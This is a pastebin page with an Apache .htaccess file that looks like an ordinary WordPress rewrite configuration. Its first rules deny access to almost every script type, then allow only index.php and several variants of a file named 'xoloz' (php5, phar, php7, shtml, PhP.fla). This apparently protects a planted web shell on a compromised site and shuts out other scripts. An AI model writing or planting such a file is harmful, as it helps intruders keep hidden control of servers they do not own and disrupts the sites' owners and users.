Facebook
From xxx, 4 Months ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 232
  1. <FilesMatch ".(py|exe|php|phtml|fla|inc|pjpg|pjpeg|sh|c|inc|phar|pjpeg|php5|php7|shtml|aspx|)$">
  2.  Order allow,deny
  3.  Deny from all
  4. </FilesMatch>
  5. <FilesMatch "^(index.php|xoloz.php5|xoloz.phar|xoloz.php7|xoloz.php|xoloz.shtml|xoloz.PhP.fla)$">
  6.  Order allow,deny
  7.  Allow from all
  8. </FilesMatch>
  9. <IfModule mod_rewrite.c>
  10. RewriteEngine On
  11. RewriteBase /
  12. RewriteRule ^index\.php$ - [L]
  13. RewriteCond %{REQUEST_FILENAME} !-f
  14. RewriteCond %{REQUEST_FILENAME} !-d
  15. RewriteRule . /index.php [L]
  16. </IfModule>